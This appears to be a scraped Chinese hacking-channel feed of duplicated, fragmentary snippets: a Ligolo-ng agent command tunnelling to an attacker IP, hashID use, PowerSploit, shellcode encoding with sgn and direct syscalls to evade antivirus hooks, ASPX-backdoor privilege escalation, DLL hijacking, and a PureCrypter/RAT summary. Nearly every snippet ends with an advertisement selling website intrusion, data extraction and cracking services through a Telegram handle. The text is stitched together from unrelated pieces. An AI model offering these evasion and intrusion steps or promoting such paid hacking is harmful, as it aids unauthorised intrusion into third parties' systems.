代理设置
启动代理很简单。只需从保存代理的文件夹启动即可。如果您使用的是 Linux,请使用 chmod +x 命令确保其可执行。然后,要启动代理并将其连接到 Ligolo-ng 代理,请运行以下命令:
./agent -connect <Attack IP>:11601 -ignore-cert
在此命令中,将 <Attack_IP> 替换为运行 Ligolo-ng 代理的 Kali 计算机的 IP 地址。我们使用 -ignore-cert 标志,因为此演示是在隔离实验室中进行的,因此我们在代理中使用了自签名证书。
代理加入后,您将在代理屏幕上看到确认消息。
该消息表明代理正在用户名为 Ubuntu、主机名为 Ubuntu-virtual-machine 的计算机上运行。它还显示了代理计算机的 IP 地址以及连接到代理服务器的端口号。
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
启动代理很简单。只需从保存代理的文件夹启动即可。如果您使用的是 Linux,请使用 chmod +x 命令确保其可执行。然后,要启动代理并将其连接到 Ligolo-ng 代理,请运行以下命令:
./agent -connect <Attack IP>:11601 -ignore-cert
在此命令中,将 <Attack_IP> 替换为运行 Ligolo-ng 代理的 Kali 计算机的 IP 地址。我们使用 -ignore-cert 标志,因为此演示是在隔离实验室中进行的,因此我们在代理中使用了自签名证书。
代理加入后,您将在代理屏幕上看到确认消息。
该消息表明代理正在用户名为 Ubuntu、主机名为 Ubuntu-virtual-machine 的计算机上运行。它还显示了代理计算机的 IP 地址以及连接到代理服务器的端口号。
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
识别哈希
如果您遇到哈希并且不确定使用了什么哈希算法,一些工具可以帮助您识别它们,例如 Hash-Identifer 或 hashID。
hashID 取代了 Hash-Identifier,尽管它仍然可以使用并且在 Kali 上默认安装。
可以使用以下命令从命令行安装 hashID。
pip install hashid
安装完成后,只需输入hashid -m需要识别的哈希值,如下所示。这将显示相应的 Hashcat 模式以及潜在的哈希值。让我们将以下哈希值放入 hashID 中。
7eb126739275d3717e981a78311dbdf6f71b7a74
该哈希被识别为 SHA-1 哈希。
这些工具尽力猜测正确的哈希值,但可能无法准确识别您输入的所有哈希值。了解您正在使用的技术将有助于您确定所使用的哈希值。
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
如果您遇到哈希并且不确定使用了什么哈希算法,一些工具可以帮助您识别它们,例如 Hash-Identifer 或 hashID。
hashID 取代了 Hash-Identifier,尽管它仍然可以使用并且在 Kali 上默认安装。
可以使用以下命令从命令行安装 hashID。
pip install hashid
安装完成后,只需输入hashid -m需要识别的哈希值,如下所示。这将显示相应的 Hashcat 模式以及潜在的哈希值。让我们将以下哈希值放入 hashID 中。
7eb126739275d3717e981a78311dbdf6f71b7a74
该哈希被识别为 SHA-1 哈希。
这些工具尽力猜测正确的哈希值,但可能无法准确识别您输入的所有哈希值。了解您正在使用的技术将有助于您确定所使用的哈希值。
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
👍1
安装 PowerSploit
在Kali Linux的最新版本中,所有 PowerSploit cmdlet 都默认安装在该/usr/share/windows-resources/powersploit 目录下。
您还可以运行 alias 命令powersploit 列出该目录并从终端切换到该目录。
使用 PowerSploit 模块
PowerSploit 有两类模块:一类是在攻击机器上本地运行的模块,另一类是在初始访问的目标系统上运行的模块。让我们看看如何使用这两种类型的模块。
本地运行模块
在攻击机器上本地运行的 PowerSploit 模块包括“侦察”和“脚本修改”。这两个模块包含使用 PowerShell 向目标系统发送网络数据包或编辑脚本内容的 cmdlet。
您必须将默认的 ZSH 终端更改为 PowerShell 终端才能使用它们。在 Kali 中,单击左上角菜单上的“应用程序”图标,然后搜索“PowerShell”。
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
在Kali Linux的最新版本中,所有 PowerSploit cmdlet 都默认安装在该/usr/share/windows-resources/powersploit 目录下。
您还可以运行 alias 命令powersploit 列出该目录并从终端切换到该目录。
使用 PowerSploit 模块
PowerSploit 有两类模块:一类是在攻击机器上本地运行的模块,另一类是在初始访问的目标系统上运行的模块。让我们看看如何使用这两种类型的模块。
本地运行模块
在攻击机器上本地运行的 PowerSploit 模块包括“侦察”和“脚本修改”。这两个模块包含使用 PowerShell 向目标系统发送网络数据包或编辑脚本内容的 cmdlet。
您必须将默认的 ZSH 终端更改为 PowerShell 终端才能使用它们。在 Kali 中,单击左上角菜单上的“应用程序”图标,然后搜索“PowerShell”。
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
开发病毒、木马、和其他恶意软件,或者是创建和使用各种自动化脚本进行攻击或防御。
黑客需要深厚的编程知识来理解和挖掘软件、硬件或网络系统中的漏洞,进而利用这些漏洞进行攻击或防御。
编程语言既是一种工具也是一种武器,黑客通过精通一种或多种编程语言来提高其技能水平,能够更加精准和高效地达到其目的。
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
黑客需要深厚的编程知识来理解和挖掘软件、硬件或网络系统中的漏洞,进而利用这些漏洞进行攻击或防御。
编程语言既是一种工具也是一种武器,黑客通过精通一种或多种编程语言来提高其技能水平,能够更加精准和高效地达到其目的。
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
自解密的shellcode
这里使用了Sgn工具,它会帮我们处理shellcode实现运行时候自解密
./sgn --arch=64 -S -i shellcode.txt
-S是代表安全生成shellcode, -i指定我们要处理的shellcode文件,--arch=64代表指定处理64位的
Windows API通过系统调用
我们用Windbg打个断点到VirutalAlloc这边,跟进去来看看正常API调用的流程,注意堆栈调用和反汇编区域
右下方是正常windows api调用的一个正常路径,最下方这两个是线程启动正常的调用
07 00000054`5532fa40 00007ff8`9a76af38 KERNEL32!BaseThreadInitThunk+0x1d
08 00000054`5532fa70 00000000`00000000 ntdll!RtlUserThreadStart+0x28
Syscall就是要跳过KERNELBASE!VirtualAlloc+0x48这一步,直接或者间接发起Syscall,达到绕过hook在KERNELBASE的杀毒
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
这里使用了Sgn工具,它会帮我们处理shellcode实现运行时候自解密
./sgn --arch=64 -S -i shellcode.txt
-S是代表安全生成shellcode, -i指定我们要处理的shellcode文件,--arch=64代表指定处理64位的
Windows API通过系统调用
我们用Windbg打个断点到VirutalAlloc这边,跟进去来看看正常API调用的流程,注意堆栈调用和反汇编区域
右下方是正常windows api调用的一个正常路径,最下方这两个是线程启动正常的调用
07 00000054`5532fa40 00007ff8`9a76af38 KERNEL32!BaseThreadInitThunk+0x1d
08 00000054`5532fa70 00000000`00000000 ntdll!RtlUserThreadStart+0x28
Syscall就是要跳过KERNELBASE!VirtualAlloc+0x48这一步,直接或者间接发起Syscall,达到绕过hook在KERNELBASE的杀毒
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
windows漏洞提权流程
能够执行cmd命令->是否打补丁->补丁对应exp->获取服务器权限
执行命令的时候 aspx->php和asp
如果管理员删除服务器组件 wscript.shell 无法在asp执行cmd命令 这个时候可以使用aspx的后门查看是否有权限执行cmd命令
选择能利用的COM口,这里的0f87369f-a4e5-4cfc-bd3e-73e6154572dd就是用来操控计划任务的。然后只需要找到对应调用的接口类,声明对应的接口类并调用其中类的里的某个函数。
例如代码里的:ITaskService
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
能够执行cmd命令->是否打补丁->补丁对应exp->获取服务器权限
执行命令的时候 aspx->php和asp
如果管理员删除服务器组件 wscript.shell 无法在asp执行cmd命令 这个时候可以使用aspx的后门查看是否有权限执行cmd命令
选择能利用的COM口,这里的0f87369f-a4e5-4cfc-bd3e-73e6154572dd就是用来操控计划任务的。然后只需要找到对应调用的接口类,声明对应的接口类并调用其中类的里的某个函数。
例如代码里的:ITaskService
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
NET 打包恶意软件。它支持多种功能,例如初始感染向量(下载器、VBA 宏、加载器)、注入方法、目标设置以及检测规避 (Anti) 技术。在此次攻击中,PureCrypter 被用作下载器。PureCrypter 的主要功能是使用 protobuf 库进行网络通信。这使得攻击者在与 C&C 服务器通信时能够将命令或状态信息序列化为预定义的消息结构。
RAT 是一款基于 .NET 的开源远程访问工具 (RAT)。它提供键盘记录、执行远程命令以及上传/下载文件等功能。攻击者怀疑使用该 RAT 远程控制受感染的系统。
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
RAT 是一款基于 .NET 的开源远程访问工具 (RAT)。它提供键盘记录、执行远程命令以及上传/下载文件等功能。攻击者怀疑使用该 RAT 远程控制受感染的系统。
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
被宿主进程加载但不在“KnownDLLs注册表项”中的DLL能够成功劫持,如ntdll.dll等系统核心dll已经被微软做了保护。其他的dll可能是宿主进程在调用LoadLibrary函数时使用了“绝对路径”,另外,个别系统内置的DLL文件的导出表中会有额外的附加数据,要对这类DLL进行劫持,必须对这些额外的附加数据也做处理才能成功劫持,最常见的情况是DLL能够成功劫持,但是会影响原应用程序的正常执行。
为了实现自动化测试DLL劫持漏洞,我编写了一个PowerShell脚本,可以检测出宿主进程在启动后加载的DLL模块,并分析出在“KnownDLLs注册表项”中不存在的已加载的DLL,当然,这个脚本只能粗略的分析出哪些DLL可能存在劫持漏洞,要实现完全自动精准的分析工具,只需要把DLL_Hijacker.py的功能和DLLHijack_Detecter.ps1的功能结合在一起即可。
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke
为了实现自动化测试DLL劫持漏洞,我编写了一个PowerShell脚本,可以检测出宿主进程在启动后加载的DLL模块,并分析出在“KnownDLLs注册表项”中不存在的已加载的DLL,当然,这个脚本只能粗略的分析出哪些DLL可能存在劫持漏洞,要实现完全自动精准的分析工具,只需要把DLL_Hijacker.py的功能和DLLHijack_Detecter.ps1的功能结合在一起即可。
接 /网站渗透 /黑客编程技术
/软件渗透 /提取数据
/网站权限 /网站入侵破解
有需求的找我 @MoA_Ke